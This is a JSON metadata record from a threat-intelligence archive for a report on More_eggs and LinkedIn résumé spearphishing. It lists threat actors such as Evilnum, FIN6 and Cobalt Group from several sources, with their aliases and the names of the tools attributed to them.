	"origins": [
		"web"
	],
	"references": [
		"https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing"
	],
	"report_names": [
		"more-eggs-and-some-linkedin-resume-spearphishing"
	],
	"threat_actors": [
		{
			"id": "059b16f8-d4e0-4399-9add-18101a2fd298",
			"created_at": "2022-10-25T15:50:23.29434Z",
			"updated_at": "2026-04-10T02:00:05.380938Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"Evilnum"
			],
			"source_name": "MITRE:Evilnum",
			"tools": [
				"More_eggs",
				"EVILNUM",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "12517c87-040a-4627-a3df-86ca95e5c13f",
			"created_at": "2022-10-25T16:07:23.61665Z",
			"updated_at": "2026-04-10T02:00:04.689Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"ATK 88",
				"Camouflage Tempest",
				"FIN6",
				"G0037",
				"Gold Franklin",
				"ITG08",
				"Skeleton Spider",
				"Storm-0538",
				"TAAL",
				"TAG-CR2",
				"White Giant"
			],
			"source_name": "ETDA:FIN6",
			"tools": [
				"AbaddonPOS",
				"Agentemis",
				"AmmyyRAT",
				"Anchor_DNS",
				"BlackPOS",
				"CmdSQL",
				"Cobalt Strike",
				"CobaltStrike",
				"FlawedAmmyy",
				"FrameworkPOS",
				"Grateful POS",
				"JSPSPY",
				"Kaptoxa",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LockerGoga",
				"MMon",
				"Magecart",
				"Meterpreter",
				"Mimikatz",
				"More_eggs",
				"NeverQuest",
				"POSWDS",
				"Reedum",
				"Ryuk",
				"SCRAPMINT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Terra Loader",
				"TerraStealer",
				"Vawtrak",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"cobeacon",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9",
			"created_at": "2022-10-25T15:50:23.317961Z",
			"updated_at": "2026-04-10T02:00:05.280403Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"FIN6",
				"Magecart Group 6",
				"ITG08",
				"Skeleton Spider",
				"TAAL",
				"Camouflage Tempest"
			],
			"source_name": "MITRE:FIN6",
			"tools": [
				"FlawedAmmyy",
				"GrimAgent",
				"FrameworkPOS",
				"More_eggs",
				"Cobalt Strike",
				"Windows Credential Editor",
				"AdFind",
				"PsExec",
				"LockerGoga",
				"Ryuk",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e",
			"created_at": "2024-06-19T02:03:08.052814Z",
			"updated_at": "2026-04-10T02:00:03.659971Z",
			"deleted_at": null,
			"main_name": "GOLD FRANKLIN",
			"aliases": [
				"FIN6 ",
				"ITG08 ",
				"MageCart Group 6 ",
				"Skeleton Spider ",
				"Storm-0538 ",
				"White Giant "
			],
			"source_name": "Secureworks:GOLD FRANKLIN",
			"tools": [
				"FrameWorkPOS",
				"Metasploit",
				"Meterpreter",
				"Mimikatz",
				"PowerSploit",
				"PowerUpSQL",
				"RemCom"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51",
			"created_at": "2022-10-25T16:07:23.474746Z",
			"updated_at": "2026-04-10T02:00:04.623746Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"ATK 67",
				"Cobalt Gang",
				"Cobalt Spider",
				"G0080",
				"Gold Kingswood",
				"Mule Libra",
				"TAG-CR3"
			],
			"source_name": "ETDA:Cobalt Group",
			"tools": [
				"ATMRipper",
				"ATMSpitter",
				"Agentemis",
				"AmmyyRAT",
				"AtNow",
				"COOLPANTS",
				"CobInt",
				"Cobalt Strike",
				"CobaltStrike",
				"Cyst Downloader",
				"Fareit",
				"FlawedAmmyy",
				"Formbook",
				"Little Pig",
				"Metasploit Stager",
				"Mimikatz",
				"More_eggs",
				"NSIS",
				"Nullsoft Scriptable Install System",
				"Pony Loader",
				"Ripper ATM",
				"SDelete",
				"Siplog",
				"SoftPerfect Network Scanner",
				"SpicyOmelette",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Terra Loader",
				"ThreatKit",
				"VenomKit",
				"cobeacon",
				"win.xloader"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd",
			"created_at": "2023-01-06T13:46:39.153487Z",
			"updated_at": "2026-04-10T02:00:03.232006Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"EvilNum",
				"Jointworm",
				"KNOCKOUT SPIDER",
				"DeathStalker",
				"TA4563"
			],
			"source_name": "MISPGALAXY:Evilnum",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ee3363a4-e807-4f95-97d8-b603c31b9de1",
			"created_at": "2023-01-06T13:46:38.485884Z",
			"updated_at": "2026-04-10T02:00:02.99385Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"SKELETON SPIDER",
				"ITG08",
				"MageCart Group 6",
				"ATK88",
				"TA4557",
				"Storm-0538",
				"White Giant",
				"GOLD FRANKLIN",
				"G0037",
				"Camouflage Tempest"
			],
			"source_name": "MISPGALAXY:FIN6",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "39ea99fb-1704-445d-b5cd-81e7c99d6012",
			"created_at": "2022-10-25T16:07:23.601894Z",
			"updated_at": "2026-04-10T02:00:04.684134Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"G0120",
				"Jointworm",
				"Operation Phantom in the [Command] Shell",
				"TA4563"
			],
			"source_name": "ETDA:Evilnum",
			"tools": [
				"Bypass-UAC",
				"Cardinal RAT",
				"ChromeCookiesView",
				"EVILNUM",
				"Evilnum",
				"IronPython",
				"LaZagne",
				"MailPassView",
				"More_eggs",
				"ProduKey",
				"PyVil",
				"PyVil RAT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraPreter",
				"TerraStealer",
				"TerraTV"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242",
			"created_at": "2022-10-25T15:50:23.744036Z",
			"updated_at": "2026-04-10T02:00:05.294413Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"Cobalt Group",
				"GOLD KINGSWOOD",
				"Cobalt Gang",
				"Cobalt Spider"
			],
			"source_name": "MITRE:Cobalt Group",
			"tools": [
				"Mimikatz",
				"More_eggs",
				"SpicyOmelette",
				"SDelete",
				"Cobalt Strike",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434434,
	"ts_updated_at": 1775826779,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e37c923c835ff3e50c03111e63681c409ddb74c7.pdf",
		"text": "https://archive.orkl.eu/e37c923c835ff3e50c03111e63681c409ddb74c7.txt",
		"img": "https://archive.orkl.eu/e37c923c835ff3e50c03111e63681c409ddb74c7.jpg"
	}
}